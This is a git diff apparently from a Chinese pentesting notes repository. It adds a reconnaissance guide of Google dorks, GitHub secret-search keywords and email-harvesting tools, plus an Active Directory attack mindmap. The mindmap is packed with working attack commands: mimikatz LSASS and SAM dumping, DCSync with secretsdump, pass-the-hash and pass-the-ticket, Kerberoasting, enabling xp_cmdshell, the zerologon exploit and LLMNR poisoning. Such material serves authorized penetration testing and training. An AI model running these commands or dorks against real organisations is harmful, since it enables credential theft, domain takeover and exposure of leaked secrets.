inurl:redir= inurl:http +``` + +#### SQL错误 + +``` +site:target.com intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:”Warning: mysql_query()" | intext:"Warning: pg_connect()" +``` + +#### phpinfo + +``` +site:target.com ext:php intitle:phpinfo "published by the PHP Group" +``` + +#### 配置文件泄露 + +``` +site:target.com ext:.xml | .conf | .cnf | .reg | .inf | .rdp | .cfg | .txt | .ora | .ini +``` + +#### 数据库文件泄露 + +``` +site:target.com ext:.sql | .dbf | .mdb | .db +``` + +#### 日志文件泄露 + +``` +site:target.com ext:.log +``` + +#### 备份和历史文件泄露 + +``` +site:target.com ext:.bkf | .bkp | .old | .backup | .bak | .swp | .rar | .txt | .zip | .7z | .sql | .tar.gz | .tgz | .tar +``` + +#### 公开文件泄露 + +``` +site:target.com filetype:.doc | .docx | .xls | .xlsx | .ppt | .pptx | .odt | .pdf | .rtf | .sxw | .psw | .csv +``` + +#### 邮箱信息 + +``` +site:target.com intext:@target.com +site:target.com 邮件 +site:target.com email +``` + +#### 社工信息 + +``` +site:target.com intitle:账号 | 密码 | 工号 | 学号 | 身份证 +``` + +### Dorks + +```shell +# Code share sites +site:http://ideone.com | site:http://codebeautify.org | site:http://codeshare.io | site:http://codepen.io | site:http://repl.it | site:http://jsfiddle.net "company" + +# GitLab/GitHub/Bitbucket +site:github.com | site:gitlab.com | site:bitbucket.org "company" + +# Stackoverflow +site:stackoverflow.com "target.com" + +# Project management sites +site:http://trello.com | site:*.atlassian.net "company" + +# Pastebin-like sites +site:http://justpaste.it | site:http://pastebin.com "company" + +# Config files +site:target.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:env | ext:ini + +# Database files +site:target.com ext:sql | ext:dbf | ext:mdb + +# Backup files +site:target.com ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup + +# .git folder +inurl:"/.git" target.com -github + +# Exposed documents +site:target.com ext:doc | ext:docx | ext:odt | ext:pdf | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv + +# Other files +site:target.com intitle:index.of | ext:log | ext:php intitle:phpinfo "published by the PHP Group" | inurl:shell | inurl:backdoor | inurl:wso | inurl:cmd | shadow | passwd | boot.ini | inurl:backdoor | inurl:readme | inurl:license | inurl:install | inurl:setup | inurl:config | inurl:"/phpinfo.php" | inurl:".htaccess" | ext:swf + +# SQL errors +site:target.com intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:"Warning: mysql_query()" | intext:"Warning: pg_connect()" + +# PHP errors +site:target.com "PHP Parse error" | "PHP Warning" | "PHP Error" + +# Login pages +site:target.com inurl:signup | inurl:register | intitle:Signup + +# Open redirects +site:target.com inurl:redir | inurl:url | inurl:redirect | inurl:return | inurl:src=http | inurl:r=http + +# Apache Struts RCE +site:target.com ext:action | ext:struts | ext:do + +# Search in pastebin +site:pastebin.com target.com + +# Linkedin employees +site:linkedin.com employees target.com + +# Wordpress files +site:target.com inurl:wp-content | inurl:wp-includes + +# Subdomains +site:*.target.com + +# Sub-subdomains +site:*.*.target.com + +#Find S3 Buckets +site:.s3.amazonaws.com | site:http://storage.googleapis.com | site:http://amazonaws.com "target" + +# Traefik +intitle:traefik inurl:8080/dashboard "target" + +# Jenkins +intitle:"Dashboard [Jenkins]" + +# Other 3rd parties sites +https://www.google.com/search?q=site%3Agitter.im%20%7C%20site%3Apapaly.com%20%7C%20site%3Aproductforums.google.com%20%7C%20site%3Acoggle.it%20%7C%20site%3Areplt.it%20%7C%20site%3Aycombinator.com%20%7C%20site%3Alibraries.io%20%7C%20site%3Anpm.runkit.com%20%7C%20site%3Anpmjs.com%20%7C%20site%3Ascribd.com%20%22united%22 + +# Backup files +https://www.google.com/search?q=site%3Aunited.com%20ext%3Abkf%20%7C%20ext%3Abkp%20%7C%20ext%3Abak%20%7C%20ext%3Aold%20%7C%20ext%3Abackup + +# Login pages +https://www.google.com/search?q=site%3Aunited.com%20inurl%3Asignup%20%7C%20inurl%3Aregister%20%7C%20intitle%3ASignup + +# Config files +https://www.google.com/search?q=site%3Aunited.com%20ext%3Axml%20%7C%20ext%3Aconf%20%7C%20ext%3Acnf%20%7C%20ext%3Areg%20%7C%20ext%3Ainf%20%7C%20ext%3Ardp%20%7C%20ext%3Acfg%20%7C%20ext%3Atxt%20%7C%20ext%3Aora%20%7C%20ext%3Aenv%20%7C%20ext%3Aini + +# .git folder +https://www.google.com/search?q=inurl%3A%5C%22%2F.git%5C%22%20united.com%20-github + +# Database files +https://www.google.com/search?q=site%3Aunited.com%20ext%3Asql%20%7C%20ext%3Adbf%20%7C%20ext%3Amdb + +# Open redirects +https://www.google.com/search?q=site%3Aunited.com%20inurl%3Aredir%20%7C%20inurl%3Aurl%20%7C%20inurl%3Aredirect%20%7C%20inurl%3Areturn%20%7C%20inurl%3Asrc%3Dhttp%20%7C%20inurl%3Ar%3Dhttp + +# Code share sites +https://www.google.com/search?q=site%3Asharecode.io%20%7C%20site%3Acontrolc.com%20%7C%20site%3Acodepad.co%20%7Csite%3Aideone.com%20%7C%20site%3Acodebeautify.org%20%7C%20site%3Ajsdelivr.com%20%7C%20site%3Acodeshare.io%20%7C%20site%3Acodepen.io%20%7C%20site%3Arepl.it%20%7C%20site%3Ajsfiddle.net%20%22united%22 + +# Pastebin-like sites +https://www.google.com/search?q=site%3Ajustpaste.it%20%7C%20site%3Aheypasteit.com%20%7C%20site%3Apastebin.com%20%22united%22 + +# Linkedin employees +https://www.google.com/search?q=site%3Alinkedin.com%20employees%20united.com + +#Project management sites +https://www.google.com/search?q=site%3Atrello.com%20%7C%20site%3A*.atlassian.net%20%22united%22 + +# Other files +https://www.google.com/search?q=site%3Aunited.com%20intitle%3Aindex.of%20%7C%20ext%3Alog%20%7C%20ext%3Aphp%20intitle%3Aphpinfo%20%5C%22published%20by%20the%20PHP%20Group%5C%22%20%7C%20inurl%3Ashell%20%7C%20inurl%3Abackdoor%20%7C%20inurl%3Awso%20%7C%20inurl%3Acmd%20%7C%20shadow%20%7C%20passwd%20%7C%20boot.ini%20%7C%20inurl%3Abackdoor%20%7C%20inurl%3Areadme%20%7C%20inurl%3Alicense%20%7C%20inurl%3Ainstall%20%7C%20inurl%3Asetup%20%7C%20inurl%3Aconfig%20%7C%20inurl%3A%5C%22%2Fphpinfo.php%5C%22%20%7C%20inurl%3A%5C%22.htaccess%5C%22%20%7C%20ext%3Aswf + +# Sub-subdomains +https://www.google.com/search?q=site%3A*.*.united.com + +# Jenkins +https://www.google.com/search?q=intitle%3A%5C%22Dashboard%20%5BJenkins%5D%5C%22%20%22united%22 + +# Traefik +https://www.google.com/search?q=intitle%3Atraefik%20inurl%3A8080%2Fdashboard%20%22united%22 + +# Cloud buckets S3/GCP +https://www.google.com/search?q=site%3A.s3.amazonaws.com%20%7C%20site%3Astorage.googleapis.com%20%7C%20site%3Aamazonaws.com%20%22united%22 + +# SQL errors +https://www.google.com/search?q=site%3Aunited.com%20intext%3A%5C%22sql%20syntax%20near%5C%22%20%7C%20intext%3A%5C%22syntax%20error%20has%20occurred%5C%22%20%7C%20intext%3A%5C%22incorrect%20syntax%20near%5C%22%20%7C%20intext%3A%5C%22unexpected%20end%20of%20SQL%20command%5C%22%20%7C%20intext%3A%5C%22Warning%3A%20mysql_connect()%5C%22%20%7C%20intext%3A%5C%22Warning%3A%20mysql_query()%5C%22%20%7C%20intext%3A%5C%22Warning%3A%20pg_connect()%5C%22 + +# Exposed documents +https://www.google.com/search?q=site%3Aunited.com%20ext%3Adoc%20%7C%20ext%3Adocx%20%7C%20ext%3Aodt%20%7C%20ext%3Apdf%20%7C%20ext%3Artf%20%7C%20ext%3Asxw%20%7C%20ext%3Apsw%20%7C%20ext%3Appt%20%7C%20ext%3Apptx%20%7C%20ext%3Apps%20%7C%20ext%3Acsv + +# Wordpress files +https://www.google.com/search?q=site%3Aunited.com%20inurl%3Awp-content%20%7C%20inurl%3Awp-includes + +# Apache Struts RCE +https://www.google.com/search?q=site%3Aunited.com%20ext%3Aaction%20%7C%20ext%3Astruts%20%7C%20ext%3Ado + +# GitLab/GitHub/Bitbucket +https://www.google.com/search?q=site%3Agithub.com%20%7C%20site%3Agitlab.com%20%7C%20site%3Abitbucket.org%20%22united%22 + +# Subdomains +https://www.google.com/search?q=site%3A*.united.com + +# Stackoverflow +https://www.google.com/search?q=site%3Astackoverflow.com%20%22united.com%22 + +# PHP errors +https://www.google.com/search?q=site%3Aunited.com%20%5C%22PHP%20Parse%20error%5C%22%20%7C%20%5C%22PHP%20Warning%5C%22%20%7C%20%5C%22PHP%20Error%5C%22 +``` +## Github + +- Github高级搜索:https://github.com/search/advanced +- GitDorker:https://github.com/obheda12/GitDorker +- gitdorks_go:https://github.com/damit5/gitdorks_go + +keywords: + +``` +"token" +"password" +"secret" +"passwd" +"username" +"key" +"apidocs" +"appspot" +"auth" +"aws_access" +"config" +"credentials" +"dbuser" +"ftp" +"login" +"mailchimp" +"mailgun" +"mysql" +"pass" +"pem private" +"prod" +"pwd" +"secure" +"ssh" +"staging" +"stg" +"stripe" +"swagger" +"testuser" +"jdbc" +``` + +除了 Github 外,还有一些其他的代码平台: + +- GitLab: https://about.gitlab.com/ +- Gitee: https://gitee.com/ +- Bitbucket: https://bitbucket.org/ + +## Stack Overflow + +Stackoverflow:https://stackoverflow.com/ + +Stack Overflow 日志: +- https://archive.org/details/stackexchange +- https://archive.org/download/stackexchange + +敏感信息可能包括: +- github key +- 简历/邮箱/手机号 + +## 社交平台 + +结合 Google Search + +- 语雀:https://www.yuque.com/dashboard +- 印象识堂:https://www.yinxiang.com/everhub/ +- wolai:https://www.wolai.com/ +- 腾讯文档:https://docs.qq.com +- 飞书文档:https://docs.feishu.cn +- 蓝湖:https://lanhuapp.com/ + +## 历史页面 + +- Wayback Machine:https://archive.org/web +- waybackurls:https://github.com/tomnomnom/waybackurls +- gau:https://github.com/lc/gau + +## 网盘 + +- 搜索导航:e.g. https://adzhp.xyz/sites/3983.html +- 聚合搜索:e.g. https://www.chaonengsou.com/ +- 蓝奏云:https://www.lanzoux.com +- 天翼云:https://www.ctyun.cn +- 阿里云盘:https://www.aliyundrive.com +- 城通网盘:https://www.ctfile.com +- 夸克网盘:https://pan.quark.cn +- 新浪微盘 + +## 邮箱 + +- Hunter:https://hunter.io +- Snov.io:https://app.snov.io +- Phonebook:also works on subdomains and urls https://phonebook.cz +- Skymem:https://www.skymem.info +- email-format:https://www.email-format.com/i/search/ +- 搜邮箱:https://souyouxiang.com/find-contact/ +- theHarvester:also works on subdomains https://github.com/laramies/theHarvester + +### Hunter + +![](images/信息收集-敏感信息收集/image-20231124162353785.png) + +### Snov.io + +![](images/信息收集-敏感信息收集/image-20231124163506452.png) + +### Phonebook + +![](images/信息收集-敏感信息收集/image-20231124163603784.png) + +### Skymem + +![](images/信息收集-敏感信息收集/image-20231124163743384.png) + +### email-format + +![](images/信息收集-敏感信息收集/image-20231124163836496.png) + + +### 搜邮箱 + +![](images/信息收集-敏感信息收集/image-20231124163031668.png) + + +### theHarvester + +![](images/信息收集-敏感信息收集/image-20231124164253796.png) diff --git "a/tips/\345\206\205\347\275\221\346\270\227\351\200\217-Pentesting AD Mindmap.svg" "b/tips/\345\206\205\347\275\221\346\270\227\351\200\217-Pentesting AD Mindmap.svg" new file mode 100644 index 0000000..ab1e01f --- /dev/null +++ "b/tips/\345\206\205\347\275\221\346\270\227\351\200\217-Pentesting AD Mindmap.svg" @@ -0,0 +1,433 @@ +]>‎no credentials‎Is enterprise admin ?‎Permissions move‎Domain admin‎got administrator access on one machine‎Lateral Move‎got username but no password‎classic quick compromission methods‎how to read‎MITM (Listen and relay)‎Listener‎NTLM Relay‎Arp poisoning‎Persistence‎Trust relationship / Forest to Forest‎Privilege escalation‎Known vulnerabilities‎Weak ADCS configuration‎Kerberos Delegation move‎valid credentials‎cracking hash‎Pentesting active ‎directory‎Scan Network‎cme smb <ip_range> # enumerate smb hosts‎nmap -sP -p <ip> # ping scan‎nmap -PN -sV --top-ports 50 --open <ip> # ‎quick scan‎nmap -PN --script smb-vuln* -p139,445 <ip> # ‎search smb vuln‎nmap -PN -sC -sV -oA <output> <ip> # classic ‎scan‎nmap -PN -sC -sV -p- -oA <output> <ip> # full ‎scan‎nmap -sU -sC -sV -oA <output> <ip> # udp scan‎find vulnerable host‎Find DC IP‎nmcli dev show eth0 # show domain name & dns‎nslookup -type=SRV _ldap._tcp.dc._msdcs.<‎domain>‎zone transfer‎dig axfr <domain_name> @<name_server>‎List guest access on smb share‎enum4linux -a -u "" -p "" <dc-ip> && ‎enum4linux -a -u "guest" -p "" <dc-ip>‎smbmap -u "" -p "" -P 445 -H <dc-ip> && ‎smbmap -u "guest" -p "" -P 445 -H <dc-ip>‎smbclient -U '%' -L //<dc-ip> && smbclient -U '‎guest%' -L //<dc-ip>‎cme smb <ip> -u '' -p '' # enumerate null session‎cme smb <ip> -u 'a' -p '' # enumerate anonymous ‎access‎Enumerate ldap‎nmap -n -sV --script "ldap* and not brute" -p ‎389 <dc-ip>‎ldapsearch -x -h <ip> -s base ‎user found‎Find user list‎enum4linux -U <dc-ip> | grep 'user:'‎cme smb <ip> --users ‎net rpc group members 'Domain Users' -W '<‎domain>' -I '<ip>' -U '%'‎OSINT - enumerate username on internet‎nmap -p 88 --script=krb5-enum-users --script-‎args="krb5-enum-users.realm='<domain>',‎userdb=<users_list_file>" <ip> ‎user found‎poisoning‎🔥 LLMNR / NBTNS/ MDNS‎responder -I eth0 (use --lm to force lm ‎downgrade) # disable smb & http if relay‎IPV6 prefered to IPV4‎mitm6 -d <domain>‎ARP poisoning‎bettercap‎Poisoning SMB ->‎ HTTP ->‎coerce‎Unauthent PetitPotam (CVE-2022-26925)‎PetitPotam.py -d <domain> <listener_ip> <‎target_ip>‎coerce SMB ->‎Enterprise Admin‎GG good luck for the report !‎ACLs/ACEs‎permissions‎🔥 dcsync‎#Administrators, Domain Admins, or Enterprise ‎Admins as well as Domain Controller computer ‎accounts‎mimikatz lsadump::dcsync /domain:<target_‎domain> /user:<target_domain>\administrator‎secretsdump '<domain>'/'<user>':'<‎password>'@'<domain_controller>'‎can change‎msDS-KeyCredentialLInk‎(Generic Write) + ADCS‎Shadow Credentials‎(need ADCS)‎Whisker.exe‎certipy shadow auto '-u <user>@<domain>' -p <‎password> -account '<target_account>'‎pywhisker.py‎pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p "‎CERTIFICATE_PASSWORD" --target "TARGET_‎SAMNAME" --action "list"‎Pass the Certificate‎On Group‎Self (Self-Membership) on Group‎GenericAll/WriteProperty on Group‎WriteProperty (Self-Membership)‎WriteOwner on Group‎WriteDACL + WriteOwner‎Give yourself Generic all‎owneredit.py ‎dacledit.py‎Add group member‎net group "<group>" <myuser> /add /domain‎ldeep ldap -u <user> -p <pwd> -d <domain> -s ‎ldap://<dc> add_to_group "CN=<user>,DC=<‎domain>" "CN=<group>,DC=<domain>"‎ACL‎On Computer‎GenericAll / GenericWrite‎msDs-AllowedToActOnBehalf‎add Key Credentials‎shadow credentials‎RBCD‎On User‎GenericAll / GenericWrite‎change password‎net user <user> <password> /domain‎add SPN (target Kerberoasting)‎targetedKerberoast.py -d <domain> -u <user> -‎p <pass>‎hash found (TGS)‎add Key Credentials‎logon script‎User with clear text pass‎Access‎shadow credentials‎ForceChangePassword‎net user <user> <password> /domain‎net rpc password <user> <password> -S <dc_‎fqdn>‎User with clear text pass‎aclpwn.py‎acltoolkit <domain>/<user>:'<password>@<‎target> get-objectacl [-all| -object <object>]‎get laps passwords‎who can read LAPS‎MATCH p=(g:Group)-[:ReadLAPSPassword]->(c:‎Computer) RETURN p‎Get-LAPSPasswords -DomainController <ip_‎dc> -Credential <domain>\<login> | Format-‎Table -AutoSize‎foreach ($objResult in $colResults){$‎objComputer = $objResult.Properties; $‎objComputer.name|where {$objcomputer.name -‎ne $env:computername}|%{foreach-object {Get-‎AdmPwdPassword -ComputerName $_}}}‎cme ldap <dc_ip> -d <domain> -u <user> -p <‎password> --module laps‎use post/windows/gather/credentials/enum_laps‎admin‎ GPO‎MATCH (gr:Group), (gp:GPO), p=((gr)-[:‎GenericWrite]->(gp)) RETURN p‎SID of principals that can create new GPOs in the ‎domain‎Get-DomainObjectAcl -SearchBase "CN=Policies,‎CN=System,DC=blah,DC=com" -‎ResolveGUIDs | ? {​​​​​​​ $_.ObjectAceType -eq "‎Group-Policy-Container" }​​​​​​​ | select ObjectDN, ‎ActiveDirectoryRights, SecurityIdentifier | fl‎return the principals that can write to the GP-Link ‎attribute on OUs‎Get-DomainOU | Get-DomainObjectAcl -‎ResolveGUIDs | ? {​​​​​​​​​​​​​ $_.ObjectAceType -eq "GP-‎Link" -and $_.ActiveDirectoryRights -match "‎WriteProperty" }​​​​​​​​​​​​​ | select ObjectDN, ‎SecurityIdentifier | fl‎Generic Write on GPO‎Abuse GPO‎Access‎DNSadmins abuse‎(CVE-2021-40469)‎dnscmd.exe /config /serverlevelplugindll <\\‎path\to\dll> # need a dnsadmin user‎sc \\DNSServer stop dns‎sc \\DNSServer start dns‎Admin‎Domain Admin‎Lateral move‎Crack Hash‎Kindly provided by Orange Cyberdefense ;-)‎Some commands can break stuff, be sure to ‎know what are you doing !‎Please find legend below.‎Domain admin‎🔥dump ntds.dit‎cme smb <dcip> -u <user> -p <password> -d <‎domain> --ntds‎secretsdump.py '<domain>/<user>:<pass>'@<ip>‎ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q‎secretsdump.py -ntds ntds_file.dit -system ‎SYSTEM_FILE -hashes lmhash:nthash LOCAL -‎outputfile ntlm-extract‎windows/gather/credentials/domain_hashdump‎certsync -u <user> -p <password> -d <domain> -‎dc-ip <dcip> -ns <nsip>‎Lateral move‎Crack Hash‎dpapi.py backupkeys -hashes ':<hash>' -t ‎Administrator@<dc_ip> --export ‎# note : dpapi.py != DonPAPI‎DonPAPI -pvk <domain_backupkey.pvk> - H ':<‎hash>' <domain>/<user>@<ip_range>‎Credentials‎Administrator access‎Extract credentials‎from LSASS‎LSASS as a Protected Process‎PPLdump64.exe <lsass.exe|lsass_pid> lsass.dmp‎mimikatz "!+" "!processprotect /process:lsass.‎exe /remove" "privilege::debug" "token::‎elevate" "sekurlsa::logonpasswords" "!‎processprotect /process:lsass.exe" "!-" #with ‎mimidriver.sys ‎procdump.exe -accepteula -ma lsass.exe lsass.‎dmp‎mimikatz "privilege::debug" "sekurlsa::minidump ‎lsass.dmp" "sekurlsa::logonPasswords" "exit"‎mimikatz "privilege::debug" "token::elevate" "‎sekurlsa::logonpasswords" "exit"‎load kiwi‎creds_all‎cme smb <ip_range> -u <user> -p <password> -‎M lsassy‎🔥lsassy -d <domain> -u <user> -p <‎password> <ip>‎User + Pass‎Hashes NTLM‎Lateral move (PTH/PTK)‎(clear text pass in some case)‎Extract credentials‎from SAM‎cme smb <ip_range> -u <user> -p '<password>' --‎sam ‎hashdump‎reg save HKLM\SAM <file>; reg save HKLM\‎SECURITY <file>; reg save HKLM\SYSTEM <file>‎secretsdump.py -system SYSTEM -sam SAM ‎LOCAL‎shadow copies‎diskshadow list shadows all‎mklink /d c:\shadowcopy \\?\GLOBALROOT\‎Device\HarddiskVolumeShadowCopy1\‎mimikatz "privilege::debug" "lsadump::sam" "‎exit"‎🔥secretsdump.py <domain>/<user>:<‎password>@<ip>‎reg.py <domain>/<user>:<password>@<ip> ‎backup -o '\\<smb_ip>\share'‎secretsdump.py -sam <sam_file> -system <‎system_file> LOCAL‎Hashes NTLM‎Lateral move PTH‎Extract credentials from LSA‎cme smb <ip_range> -u <user> -p '<password>' --‎lsa‎🔥secretsdump.py <domain>/<user>:<‎password>@<ip>‎reg.py <domain>/<user>:<password>@<ip> ‎backup -o '\\<smb_ip>\share'‎secretsdump.py -security <security_file> -‎system <system_file> LOCAL‎Cached domain logon‎Machine account‎Service account‎MsCache 2‎User + Pass‎dpapi extract‎🔥DonPAPI.py <domain>/<user>:<‎password>@<target>‎mimikatz.exe "sekurlsa::dpapi"‎secretsdump.py <domain>/<user>:<passwor>@<‎ip>‎search password files‎findstr /si 'password' *.txt *.xml *.docx‎search stored password ‎lazagne.exe all‎chrome‎%appdata%\Local\Google\Chrome\User Data\‎Default‎SharpChromium.exe‎token manipulation‎.\incognito.exe list_tokens -u‎.\incognito.exe execute -c "<domain>\<user>" ‎powershell.exe‎use incognito‎impersonate_token <domain>\\<user>‎cme smb <ip> -u <user> -p <password> -M ‎impersonate ‎irs.exe list‎irs.exe exec --pid <pid> --command <command>‎Extract credentials with certificate ‎authentication (ADCS required)‎masky - d <domain> -u <user> (-p <password> ||‎ -k || -H <hash>) -ca <certificate authority> <ip>‎NT hash‎Lateral move PTH‎ccache‎Lateral move Pass the ticket‎pfx‎Lateral move Pass the certificate‎ACL‎User + Pass‎Impersonate RDP Session‎psexec -s -i cmd‎query user‎cmd /k tscon <id> /dest:console‎Lateral move RDP‎Hydrid-Environement (Azure AD Connect)‎Dump cleartext password of MSOL Account on ‎AAD Connect server‎azuread_decrypt_msol_v2.ps1‎cme smb <ip> -u <user> -p <password> -M msol‎DCSync‎User + Pass‎Lateral move (Clear text pass)‎Lateral move‎WSUSpect‎WSUSpendu.ps1 # need compromised WSUS ‎server‎sccm admin‎abuse sccm‎CMPivot‎PowerSCCM‎SharpSCCM‎Administrator access‎MSSQL‎find mssql access‎cme mssql <ip> -u <user> -p <password> -d <‎domain>‎Users with SQLadmin‎MATCH p=(u:User)-[:SQLAdmin]->(c:Computer) ‎RETURN p‎EXECUTE sp_configure 'show advanced options', ‎1; RECONFIGURE;‎EXECUTE sp_configure 'xp_cmdshell', 1; ‎RECONFIGURE;‎EXEC xp_cmdshell '<cmd>'‎Low Access‎trust link‎Get-SQLServerLinkCrawl -username <user> -‎password <pass> -Verbose -Instance <sql_‎instance> -Query "<query>"‎use exploit/windows/mssql/mssql_linkcrawler‎MSSQL‎mssqlclient.py -windows-auth <domain>/<‎user>:<password>@<ip> (pr #1397)‎enum_db‎enable_xp_cmdshell‎xp_cmdshell <cmd>‎Low Access‎enum_impersonate‎exec_as_user <user>‎exec_as_login <login>‎MSSQL‎xp_dir_tree <ip>‎trustlink‎sp_linkedservers‎use_link‎MSSQL‎coerce SMB ->‎Local User‎cme smb -u <user> -p <pass>' <ip> --local-auth‎impacket like cleartext pasword without domain/‎Administrator access‎Password‎Cleartext password‎interactive-shell‎psexec.py <domain>/<user>:<password>@<ip>‎psexec.exe -AcceptEULA \\<ip>‎mimikatz "privilege::debug sekurlsa::pth /user:<‎user> /domain:<domain> /ntlm:<hash>"‎Authority/sytem‎pseudo-shell (file write and read)‎atexec.py <domain>/<user>:<password>@<ip> "‎command"‎smbexec.py <domain>/<user>:<password>@<‎ip>‎wmiexec.py <domain>/<user>:<password>@<‎ip>‎dcomexec.py <domain>/<user>:<password>@<‎ip>‎crackmapexec smb <ip_range> -u <user> -p <‎password> -d <domain>‎crackmapexec smb <ip_range> -u <user> -p <‎password> -local-auth‎Authority/sytem‎WinRM‎evil-winrm -i <ip> -u <user> -p <password>‎RDP‎xfreerdp /u:<user> /d:<domain> /p:<password> /‎v:<ip>‎SMB‎smbclient.py <domain>/<user>:<password>@<‎ip>‎search files‎MSSQL‎crackmapexec mssql <ip_range> -u <user> -p <‎password>‎mssqlclient.py -windows-auth <domain>/<‎user>:<password>@<ip>‎MSSQL‎Administrator access‎Low access‎High access‎NTLM Hash‎🔥 Pass the hash (PTH)‎interactive-shell‎psexec.py -hashes ":<hash>" <user>@<ip>‎psexec.exe -AcceptEULA \\<ip>‎mimikatz "privilege::debug sekurlsa::pth /user:<‎user> /domain:<domain> /ntlm:<hash>"‎Authority/sytem‎pseudo-shell (file write and read)‎atexec.py -hashes ":<hash>" <user>@<ip> "‎command"‎smbexec.py -hashes ":<hash>" <user>@<ip>‎wmiexec.py -hashes ":<hash>" <user>@<ip>‎dcomexec.py -hashes ":<hash>" <user>@<ip>‎crackmapexec smb <ip_range> -u <user> -d <‎domain> -H ':<hash>'‎crackmapexec smb <ip_range> -u <user> -H ':<‎hash>' --local-auth‎Authority/sytem‎WinRM‎evil-winrm -i <ip> -u <user> -H <hash>‎RDP‎reg.py <domain>/<user>@<ip> -hashes ':<hash>' ‎add -keyName 'HKLM\System\‎CurrentControlSet\Control\Lsa' -v '‎DisableRestrictedAdmin' -vt 'REG_DWORD' -vd '0'‎xfreerdp /u:<user> /d:<domain> /pth:<hash> /‎v:<ip>‎SMB‎smbclient.py -hashes ":<hash>" <user>@<ip>‎search files‎MSSQL‎crackmapexec mssql <ip_range> -H ':<hash>'‎mssqlclient.py -windows-auth -hashes ":<‎hash>" <domain>/<user>@<ip> ‎MSSQL‎Administrator access‎Low access‎High access‎overpass the hash / pass the key (PTK)‎Rubeus asktgt /user:victim /rc4:<rc4value>‎Rubeus ptt /ticket:<ticket>‎Rubeus createnetonly /program:C:\Windows\‎System32\[cmd.exe||upnpcont.exe]‎Rubeus ptt /luid:0xdeadbeef /ticket:<ticket>‎getTGT.py <domain>/<user> -hashes :<hashes>‎getTGT.py -aesKey '<key>' <domain>/<user>@<‎ip>‎Pass the ticket‎Kerberos‎Pass the ticket‎(ccache / kirbi)‎Convert format‎ticketConverter.py <kirbi||ccache> <ccache||‎kirbi>‎export KRB5CCNAME=/root/impacket-‎examples/domain_ticket.ccache‎impacket tools: Same as Pass the hash but use : -‎k and -no-pass for impacket‎mimikatz kerberos::ptc "<ticket>"‎Rubeus.exe ptt /ticket:<ticket>‎proxychains secretsdump -k'<domain>'/'<‎user>'@'<ip>'‎modify SPN‎tgssub.py -in <ticket.ccache> -out <newticket.‎ccache> -altservice "<service>/<target>" #pr ‎1256‎Pass the Ticket‎Administrator access‎see dcsync‎aesKey‎impacket tools: Same as Pass the hash but use : -‎aesKey for impacket (and use FQDN)‎proxychains secretsdump -aesKey <key> '<‎domain>'/'<user>'@'<ip>'‎see dcsync‎Administrator access‎Socks (with NTLM relay)‎proxychains lookupsid.py <domain>/<user>@<‎ip> -no-pass -domain-sids‎proxychains mssqlclient.py -windows-auth <‎domain>/<user>@<ip> -no-pass‎proxychains secretsdump -no-pass '<domain>'/'<‎user>'@'<ip>'‎pseudo-shell (file write and read)‎proxychains atexec.py -no-pass <domain>/<‎user>@<ip> "command"‎proxychains smbexec.py -no-pass <domain>/<‎user>@<ip>‎Authority/sytem‎proxychains smbclient.py -no-pass <user>@<ip>‎search files‎Users‎MSSQL‎see dcsync‎Administrator access‎Certificate (pfx)‎get hash NTLM from certificate‎certipy auth -pfx <crt_file> -dc-ip <dc_ip>‎NTLM hash‎Pass the Certificate‎pkinit‎ gettgtpkinit.py -cert-pfx "<pfx_file>" ^[-pfx-‎pass "<cert-password>"] "<fqdn_domain>/<‎user>" "<tgt_ccache_file>"‎Rubeus.exe asktgt /user:"<username>" /‎certificate:"<pfx_file>" [/password:"<certificate_‎password>"] /domain:"<fqdn-domain>" /dc:"<‎dc>" /show‎certipy auth -pfx <crt_file> -dc-ip <dc_ip>‎Schannel‎certipy auth -pfx <crt_file> -ldap-shell‎add_computer‎set_rbcd‎RBCD‎Pass the ticket‎Got valid username‎🔥Password spray‎Get password policy (need creds, but you should ‎get the policy before starting a spray)‎cme <IP> -u 'user' -p 'password' --pass-pol‎enum4linx -u 'username' -p 'password' -P <IP>‎Get-ADDefaultDomainPasswordPolicy‎FGPP‎ Get-ADFineGrainedPasswordPolicy -filter *‎Get-ADUserResultantPasswordPolicy -Identity <‎user>‎ldapsearch-ad.py --server '<dc>' -d <domain> -‎u <user> -p <pass> --type pass-pols‎cme smb <dc-ip> -u user.txt -p password.txt --‎no-bruteforce # test user=password‎cme smb <dc-ip> -u user.txt -p password.txt # ‎multiple test (carrefull of lock policy)‎sprayhound -U <users.txt> -d <domain> -dc <‎dcip>‎Clear text credentials found‎ASREPRoast‎Get ASREPRoastable users (need creds)‎Get-DomainUser -PreauthNotRequired -‎Properties SamAccountName‎MATCH (u:User {dontreqpreauth:true}), (c:‎Computer), p=shortestPath((u)-[*1..]->(c)) ‎RETURN p‎Get hash‎python GetNPUsers.py <domain>/ -usersfile <‎usernames.txt> -format hashcat -outputfile <‎hashes.domain.txt>‎Rubeus.exe asreproast /format:hashcat‎Blind Kerberoasting‎Rubeus.exe keberoast /domain:<domain> /dc:<‎dcip> /nopreauth: <asrep_user> /spns:<users.‎txt>‎GetUserSPNs.py -no-preauth "<asrep_user>" -‎usersfile "<user_list.txt>" -dc-host "<dc_ip>" "<‎domain>"/‎Hash found (TGS)‎CVE-2022-33679‎python3 CVE-2022-33679.py <domain>/<‎user> <target>‎Hash found (ASREP)‎Lateral move (PTT)‎Low hanging fruit‎zerologon (unsafe)‎(CVE-2020-1472)‎zerologon-scan '<dc_netbios_name>' '<ip>'‎python3 cve-2020-1472-exploit.py <MACHINE_‎BIOS_NAME> <ip>‎secretsdump.py <DOMAIN>/<MACHINE_BIOS_‎NAME>\$@<IP> -no-pass -just-dc-user "‎Administrator" ‎secretsdump.py -hashes :<HASH_admin> <‎DOMAIN>/Administrator@<IP>‎python3 restorepassword.py -target-ip <IP> <‎DOMAIN>/<MACHINE_BIOS_NAME>@<MACHINE_‎BIOS_NAME> -hexpass <HEXPASS>‎Eternal Blue‎MS17-010‎exploit/windows/smb/ms17_010_eternalblue‎SYSVOL & GPP‎MS14-025‎use scanner/smb/smb_enum_gpp‎findstr /S /I cpassword \\<FQDN>\sysvol\<‎FQDN>\policies\*.xml‎tomcat/jboss 